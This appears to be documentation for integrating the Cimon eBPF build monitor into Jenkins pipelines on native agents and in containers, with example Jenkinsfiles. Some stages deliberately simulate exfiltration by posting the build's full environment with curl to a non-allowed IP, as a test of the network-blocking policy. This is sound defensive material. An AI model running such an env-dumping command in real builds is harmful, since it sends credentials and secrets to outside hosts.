
Jenkins

Jenkins does not offer hosted runners out of the box the way GitHub Actions and Azure Pipelines do, but it gives you great flexibility in the kinds of self-hosted runners (agents) you can use and how they execute jobs.

Jenkins Self-Hosted Runners Support

In Jenkins, there are two ways to execute jobs: creating virtual or physical nodes (agents) that run the jobs directly, or setting up a cloud (e.g., Docker-based, K8s-based) that provisions an ephemeral agent for each job.

In both cases the underlying operating system must meet the minimal requirements for loading and running eBPF programs, and the build must have the privileges needed to load them (the examples below run Cimon as root). You can find more information in the self-hosted support and troubleshooting section.

Jenkins Support

Cimon must be run in a way that matches the Jenkins runner mode in use, and the limitations of each mode should be understood:

  • Agent Runner - When builds run natively on the agent (no containers), only a single Cimon instance can run on that agent at a time, because only one Cimon program can be attached to a given network interface. Concurrent builds that share one agent therefore have to be serialized.
  • Docker-based Runner - Agents provisioned by a Docker cloud are not yet supported. (Running Cimon inside a container started by the docker agent directive on a regular node is a different case, shown below.)
  • Kubernetes-based Runner - Cimon can be run in Kubernetes-based runner environments (which are highly popular among enterprises) through Cimon's DaemonSet mode of operation.

Cimon Jenkins Pipeline

Cimon can be used with all major Jenkins job types: "Freestyle project", "Pipeline", and "Multibranch Pipeline".

Running Cimon Natively

Here is a Jenkinsfile that runs a build with Cimon running natively on the Jenkins agent. The later stages exercise the policy: allowed traffic succeeds, and traffic to hosts or IPs outside the policy is reported by Cimon (the `|| true` keeps the stage green even when a request is blocked or times out).

pipeline {
    // Any agent; the agent must meet the eBPF requirements and allow sudo.
    agent any

    environment {
        // Pulled from the Jenkins credential store and masked in the log.
        CIMON_CLIENT_ID = credentials("cimon-client-id")
        CIMON_SECRET = credentials("cimon-secret")
    }

    options {
        // Only one build of this job at a time (one Cimon instance per agent).
        disableConcurrentBuilds()
    }

    stages {
        stage('Install Cimon') {
            steps {
                // Installs the cimon binary; the agent is not started yet.
                sh 'curl -sSfL https://cimon-releases.s3.amazonaws.com/install.sh | sudo sh -s -- -b /usr/local/bin'
            }
        }

        stage('Run Cimon') {
            steps {
                // -E keeps the CIMON_* variables across sudo; tracing starts here.
                sh 'sudo -E cimon agent start-background'
            }
        }

        stage('Test') {
            steps {
                sh 'git clone https://github.com/octocat/Hello-World Hello-World'
            }
        }

        stage('Allowed network traffic') {
            steps {
                sh 'curl -sm 1 https://34.121.34.97 || true'
            }
        }

        stage('Allowed network traffic (hostname)') {
            steps {
                sh 'wget --quiet --timeout 1 https://cycode.com || true'
                sh 'wget --quiet --timeout 1 https://registry.npmjs.org || true'
            }
        }

        stage('Forbidden network traffic (IP)') {
            steps {
                // Simulates exfiltration of the build environment to a non-allowed IP.
                sh 'curl -sm 1 -d "$(env)" https://34.121.34.100/upload/v2 || true'
            }
        }

        stage('Forbidden network traffic (hostname)') {
            steps {
                sh 'wget --quiet --timeout 1 https://yahoo.com || true'
            }
        }
    }

    post {
        always {
            // Runs even if a stage failed: stops the agent and prints the report.
            sh 'sudo -E cimon agent stop'
        }
    }
}

Explanation:

environment {
    CIMON_CLIENT_ID = credentials("cimon-client-id")
    CIMON_SECRET = credentials("cimon-secret")
}

Cimon reads its input parameters from environment variables, and the security policy is configured through them as well. Here the two credentials are bound from the Jenkins credential store with credentials(), which also masks their values in the build log.

options {
    disableConcurrentBuilds()
}

This option must be enabled so that two builds of this job cannot run at the same time and try to start a second Cimon instance on the same agent. Note that it only serializes builds of this one job; two different jobs scheduled on the same agent are not serialized by it and would still hit the single-instance limitation described above.

stage('Install Cimon') {
    steps {
        sh 'curl -sSfL https://cimon-releases.s3.amazonaws.com/install.sh | sudo sh -s -- -b /usr/local/bin'
    }
}

Installs the Cimon agent on the runner. This step does not start the agent yet. The installer is fetched over HTTPS and executed as root on every build; if you would rather not pipe a remote script into a root shell, download it once, review it and bake the resulting binary into your agent image. More information on installation options can be found on the CLI integration page.

stage('Run Cimon') {
    steps {
        sh 'sudo -E cimon agent start-background'
    }
}

Starts the Cimon agent in the background. Once this step completes successfully, Cimon traces all activity according to the given configuration. Anything that ran before this point, including the installation step itself, is not covered by the trace.

post {
    always {
        sh 'sudo -E cimon agent stop'
    }
}

The Cimon agent is stopped and the report is printed. Putting this in post { always } ensures the agent is stopped and the report is produced even when one of the stages fails.
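The single-instance limitation of the native agent runner and the per-job scope of disableConcurrentBuilds() leave one gap: two different jobs landing on the same agent can each try to start Cimon. The Jenkinsfile below is an added example, not from the Cimon documentation, that closes that gap by serializing the whole Cimon lifecycle across jobs. It assumes the Lockable Resources plugin is installed (for the lock() step) and that agents meeting the eBPF requirements carry a label named cimon-capable; the credential IDs are the ones used on this page.

```groovy
// Added example, not from the Cimon documentation. Assumes the Lockable
// Resources plugin (lock() step) and an agent label 'cimon-capable'.
pipeline {
    agent { label 'cimon-capable' }

    environment {
        CIMON_CLIENT_ID = credentials("cimon-client-id")
        CIMON_SECRET = credentials("cimon-secret")
        CIMON_PREVENT = "1"
        // Entries are kept unindented so the value carries no leading whitespace.
        CIMON_ALLOWED_HOSTS = """
github.com
registry.npmjs.org
"""
    }

    options {
        // Still useful, but only serializes builds of this job.
        disableConcurrentBuilds()
    }

    stages {
        stage('Build under Cimon') {
            steps {
                // One lock per machine: NODE_NAME is the node this build was
                // scheduled on. Any other job that uses the same resource name
                // waits here instead of starting a second Cimon instance.
                lock(resource: "cimon-${env.NODE_NAME}") {
                    sh 'curl -sSfL https://cimon-releases.s3.amazonaws.com/install.sh | sudo sh -s -- -b /usr/local/bin'
                    sh 'sudo -E cimon agent start-background'
                    script {
                        try {
                            // The actual build; everything from here on is traced.
                            sh 'git clone https://github.com/octocat/Hello-World Hello-World'
                        } finally {
                            // Stop (and print the report) before the lock is
                            // released, so the next build never finds a running agent.
                            sh 'sudo -E cimon agent stop'
                        }
                    }
                }
            }
        }
    }
}
```

Every job that may share an agent must use the same resource naming scheme for the lock to be effective. The stop is done in a try/finally inside the lock rather than in post { always } so that the lock is not released while an agent is still running; a post { always } stop would execute only after the lock block has already been released.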

Running Cimon in a Container

Jenkins builds commonly use a fresh container for every build, which keeps the environment clean and ensures that one build does not interfere with another. Separately, Cimon instances can interfere with one another when several Jenkins executors run on the same agent without sufficient isolation, because they all share the same kernel.

When Cimon runs inside a container, it isolates its execution context to that container only, which lets Jenkins run multiple builds with prevention policies simultaneously on one agent.

In this example, Cimon is running inside a container:

pipeline {
    agent {
        docker {
            image 'ubuntu:22.04'
            // root and --privileged are needed to load eBPF from inside the container.
            args '--user="root" --privileged'
        }
    }

    environment {
        // Enforce the policy (block), not just report.
        CIMON_PREVENT = "1"
        // One entry per line; entries are left unindented so the value has no leading whitespace.
        CIMON_ALLOWED_HOSTS = """
github.com
registry.npmjs.org
cycode.com
"""
        CIMON_ALLOWED_IPS = """
34.121.34.97
"""
    }

    options {
        disableConcurrentBuilds()
    }

    stages {
        stage('Install Cimon') {
            steps {
                // The base image has no curl/wget; no sudo needed, we already run as root.
                sh 'apt update && apt install curl wget -y'
                sh 'curl -sSfL https://cimon-releases.s3.amazonaws.com/install.sh | sh -s -- -b /usr/local/bin'
            }
        }

        stage('Run Cimon') {
            steps {
                // Scoped to this container's processes and connections.
                sh 'cimon agent start-background'
            }
        }

        stage('Allowed network traffic') {
            steps {
                sh 'curl -sm 1 https://34.121.34.97 || true'
            }
        }

        stage('Allowed network traffic (hostname)') {
            steps {
                sh 'wget --quiet --timeout 1 https://cycode.com || true'
                sh 'wget --quiet --timeout 1 https://registry.npmjs.org || true'
            }
        }

        stage('Forbidden network traffic (IP)') {
            steps {
                // Simulated exfiltration of the environment; blocked because CIMON_PREVENT=1.
                sh 'curl -sm 1 -d "$(env)" https://34.121.34.100/upload/v2 || true'
            }
        }

        stage('Forbidden network traffic (hostname)') {
            steps {
                sh 'wget --quiet --timeout 1 https://yahoo.com || true'
            }
        }
    }

    post {
        always {
            sh 'cimon agent stop'
        }
    }
}

The printed Cimon report (and the policies it enforces) cover only the container's processes and network connections. The host environment is neither monitored nor restricted, so only the build process inside the container is controlled. Keep in mind that --privileged grants the container the host's full capabilities and device access; that is what allows Cimon to load eBPF from inside it, so the container scopes Cimon's view but is not a hardening boundary against the build itself.

Usage

The parameters that can be supplied to Cimon are described on the CLI integration page.

Report

Cimon prints the final report in the build log of each job.